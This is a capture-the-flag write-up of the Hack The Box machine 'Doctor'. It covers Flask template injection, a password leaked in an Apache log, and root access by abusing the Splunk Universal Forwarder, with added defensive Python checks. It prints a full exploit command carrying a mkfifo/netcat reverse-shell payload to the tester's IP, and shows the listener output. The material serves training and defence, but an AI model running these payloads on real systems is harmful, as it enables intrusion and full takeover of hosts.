
Doctor Writeup [HTB]

Doctor is a Linux machine from Hack The Box rated as easy. It consists of finding a virtual host that serves a messaging application vulnerable to server-side template injection (SSTI); after obtaining a shell, a root shell can be obtained by abusing the Splunk Universal Forwarder.

Enumeration

Running nmap:

nmap -sC -sV doctor.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST
Nmap scan report for doctor.htb (10.129.18.114)
Host is up (0.047s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the main page of the site.

Scrolling down a bit we can see an email address, info@doctors.htb, so I added doctors.htb to my hosts file as it could be a virtual host.

Browsing to doctors.htb we are greeted with a login form, but there is an option to register new users.

So we can create an account and access the site.

Once logged in we can create messages.

Now we can use gobuster to discover hidden directories:

gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/register (Status: 200)
/account (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/home (Status: 302)
/logout (Status: 302)

Browsing to /archive the page seems empty, but inspecting the source code we can see the title of our message:

<?xml version="1.0" encoding="UTF-8" ?>
	<rss version="2.0">
	<channel>
 	<title>Archive</title>
 	<item><title>Test</title></item>

			</channel>

Checking Wappalyzer we see the site has been built with Flask on Python 3.

Taking this into account, we can test whether the site is vulnerable to SSTI (server-side template injection): we submit a mathematical expression as a message and then check whether it has been evaluated.

Going to /archive we see the result of the mathematical operation, so the site is vulnerable to SSTI:

<?xml version="1.0" encoding="UTF-8" ?>
	<rss version="2.0">
	<channel>
 	<title>Archive</title>
 	<item><title>Test</title></item>

			</channel>
			<item><title>14</title></item>

			</channel>
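Why the archive feed evaluated the expression, and what the same view looks like when written safely, as an added example that is not code from the writeup or from the Doctor box. It assumes Jinja2 (Flask's template engine) is installed; the sample messages and the archive_feed_* functions are constructed stand-ins for the site's RSS view, and looks_like_template_probe is the kind of cheap rule a WAF or a log review would use to spot probes like the one above.

```python
"""Added example (not code from the writeup or the Doctor box): the template
pattern that makes the archive feed injectable, next to the safe form.
Assumes Jinja2 (Flask's template engine) is installed; the messages and the
archive_feed_* functions are constructed stand-ins for the site's RSS view."""
import re
from jinja2 import Environment

# Constructed sample message titles: a harmless one and the same kind of
# probe as in the writeup, a math expression in template syntax.
MESSAGES = ["Test", "{{7*7}}"]

env = Environment(autoescape=True)


def archive_feed_vulnerable(titles):
    """Builds the template SOURCE from user data, so Jinja parses the user's
    text as template syntax; this is the SSTI pattern."""
    items = "".join(f"<item><title>{t}</title></item>" for t in titles)
    src = "<rss><channel><title>Archive</title>" + items + "</channel></rss>"
    return env.from_string(src).render()


def archive_feed_safe(titles):
    """The template source is a fixed string; user data only enters as a
    context variable, so it is HTML-escaped and never parsed as syntax."""
    src = ("<rss><channel><title>Archive</title>"
           "{% for t in titles %}<item><title>{{ t }}</title></item>{% endfor %}"
           "</channel></rss>")
    return env.from_string(src).render(titles=titles)


# Delimiters of the common engine families (Jinja/Twig, EL/FreeMarker, ERB/JSP),
# usable as a cheap review or WAF rule for probes in user-submitted fields.
TEMPLATE_PROBE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>")


def looks_like_template_probe(text):
    """True when the text contains template delimiters of a known engine."""
    return bool(TEMPLATE_PROBE.search(text))


if __name__ == "__main__":
    print(archive_feed_vulnerable(MESSAGES))  # the probe comes back as 49
    print(archive_feed_safe(MESSAGES))        # the probe comes back verbatim
    for m in MESSAGES:
        print(f"{m!r}: probe={looks_like_template_probe(m)}")
```

The difference between the two functions is the whole fix: with render_template_string (or from_string) the template text must never be assembled from request data, and a message title belongs in the render context, where autoescaping also neutralises HTML.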

Exploitation

Now we can try to get a Python reverse shell using a payload from PayloadAllTheThings.

After posting the message we trigger it by browsing to /archive; checking netcat we get a reverse shell as the web user:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
$ whoami
web

Now we need to pivot to the other user, shaun:

web@doctor:/home$ ls
shaun  web

Inside the Apache2 logs folder there was a file called backup which caught my attention:

web@doctor:/var/log/apache2$ ls
access.log        access.log.6.gz  error.log.11.gz  error.log.6.gz
access.log.1      access.log.7.gz  error.log.12.gz  error.log.7.gz
access.log.10.gz  access.log.8.gz  error.log.13.gz  error.log.8.gz
access.log.11.gz  access.log.9.gz  error.log.14.gz  error.log.9.gz
access.log.2.gz   backup           error.log.2.gz   other_vhosts_access.log
access.log.3.gz   error.log        error.log.3.gz
access.log.4.gz   error.log.1      error.log.4.gz
access.log.5.gz   error.log.10.gz  error.log.5.gz

Grepping for "password" inside it we get the credentials for pivoting to shaun:

web@doctor:/var/log/apache2$ cat backup | grep password
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
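The backup log leaked the password because it was sent as a URL parameter, which Apache writes to the access log in clear. As an added example that is not from the writeup, the scanner below flags access-log lines that carry a query string on a credential-related endpoint or that use a secret-looking parameter name; the log lines are constructed, modelled on the line found on the box, and parameter values are never echoed in the findings.

```python
"""Added example (not from the writeup): find credentials leaked through URLs
in Apache access logs. The sample lines are constructed, modelled on the
backup file found on Doctor."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of an Apache access log.
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "GET /login HTTP/1.1" 200 1874 "-"
10.10.14.4 - - [05/Sep/2020:11:19:45 +2000] "GET /api/items?token=abc123def HTTP/1.1" 200 512 "-"
10.10.14.4 - - [05/Sep/2020:11:20:10 +2000] "GET /archive HTTP/1.1" 200 317 "-"
"""

# client, ident, user, [timestamp], "METHOD target [HTTP/x.y]", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# Endpoints that should never take parameters in the URL at all.
CREDENTIAL_PATH = re.compile(r"password|passwd|login|signin|reset|auth", re.I)
# Parameter names that are secrets wherever they appear.
SECRET_PARAM = re.compile(r"^(pass(word|wd)?|pwd|secret|token|api_?key|session(id)?|otp)$", re.I)


def scan_access_log(text):
    """Return one finding per suspicious request; parameter values are
    deliberately omitted so the report does not leak what the log leaked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qsl(url.query, keep_blank_values=True)
        if not params:
            continue
        reasons = []
        if CREDENTIAL_PATH.search(url.path):
            reasons.append("query string on credential endpoint")
        secret_keys = [k for k, _ in params if SECRET_PARAM.match(k)]
        if secret_keys:
            reasons.append("secret parameter name(s): " + ", ".join(secret_keys))
        if reasons:
            findings.append({
                "line": lineno,
                "client": m["ip"],
                "method": m["method"],
                "path": url.path,
                "params": [k for k, _ in params],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} {f['path']} params={f['params']} "
              f"-> {'; '.join(f['reasons'])}")
```

The endpoint rule is what catches the Doctor line: the parameter is called email, so a name-based rule alone would miss it, but a password-reset endpoint has no business receiving anything in the query string. Credentials belong in the request body over TLS, and log files holding them need the same protection as the credentials themselves.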

Privilege Escalation

Going back to the nmap scan, we found that port 8089 was open running Splunk.

Inside the /opt directory there was another directory called splunkforwarder:

shaun@doctor:/opt$ ls
clean  splunkforwarder

Searching for splunkforwarder privilege escalation I came across the following exploit.

This GitHub repo contains two exploits, a local and a remote one. As the exploit was written in Python 2 and the machine had Python 3, I decided to go with the remote exploit.

With this exploit we abuse the Splunk Universal Forwarder by configuring it to use our machine as its deployment server; once the connection is made, our machine serves malicious code as a deployment application.

To run the exploit remotely we need to use shaun's credentials instead of the default ones; then we can specify the payload to obtain a reverse shell through netcat.

Running the exploit:

python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123 \
--payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f'
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.161:8181/
10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

Checking netcat we have obtained a root shell:

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
doctor
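The escalation works because the forwarder runs as root, accepts a new deployment server and an app install from anyone holding valid credentials, and exposes its management port (8089, already visible in the nmap scan). As an added defender's check, not code from the writeup or from the exploit repository, the audit below parses a forwarder's deploymentclient.conf and server.conf (constructed samples here, with the targetUri assumed to have been pointed at the attacker host) and flags a deployment server that is not on an allowlist and a management port that has not been disabled with disableDefaultPort; the allowlist hostname is an assumption.

```python
"""Added example (not from the writeup or the exploit repo): audit a Splunk
Universal Forwarder's deployment-client and management-port settings.
Both .conf samples are constructed; the targetUri is assumed to have been
pointed at the attacker host, as the exploit on this box does."""
import configparser

# Constructed $SPLUNK_HOME/etc/system/local/deploymentclient.conf
DEPLOYMENTCLIENT_CONF = """\
[deployment-client]
clientName = doctor-forwarder

[target-broker:deploymentServer]
targetUri = 10.10.14.161:8181
"""

# Constructed $SPLUNK_HOME/etc/system/local/server.conf
SERVER_CONF = """\
[general]
serverName = doctor

[httpServer]
disableDefaultPort = false
"""

# Deployment servers this forwarder is allowed to take apps from (assumed name).
ALLOWED_DEPLOYMENT_SERVERS = {"deploy.doctor.htb:8089"}


def _parse(conf_text):
    # Splunk .conf files are INI-like; '%' must not be treated as interpolation.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    return cp


def audit_forwarder(deploymentclient_conf, server_conf, allowed_servers):
    """Return a list of findings; an empty list means both checks passed."""
    findings = []

    dc = _parse(deploymentclient_conf)
    target = dc.get("target-broker:deploymentServer", "targetUri", fallback=None)
    if target is not None and target not in allowed_servers:
        findings.append(f"deployment server '{target}' is not on the allowlist; "
                        "apps pushed from it run with the forwarder's privileges")

    sc = _parse(server_conf)
    if not sc.getboolean("httpServer", "disableDefaultPort", fallback=False):
        findings.append("management port (8089) is enabled; a forwarder that only "
                        "ships logs does not need it reachable")
    return findings


if __name__ == "__main__":
    for finding in audit_forwarder(DEPLOYMENTCLIENT_CONF, SERVER_CONF,
                                   ALLOWED_DEPLOYMENT_SERVERS):
        print("[!]", finding)
```

The third control, running the forwarder as an unprivileged user instead of root, is not visible in these files, but it is the reason the installed app gave a root shell on Doctor rather than a shell as a service account. Changing the default admin credentials matters too: here the attacker needed shaun's password only because the defaults had already been changed.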
This post is licensed under CC BY 4.0 by the author.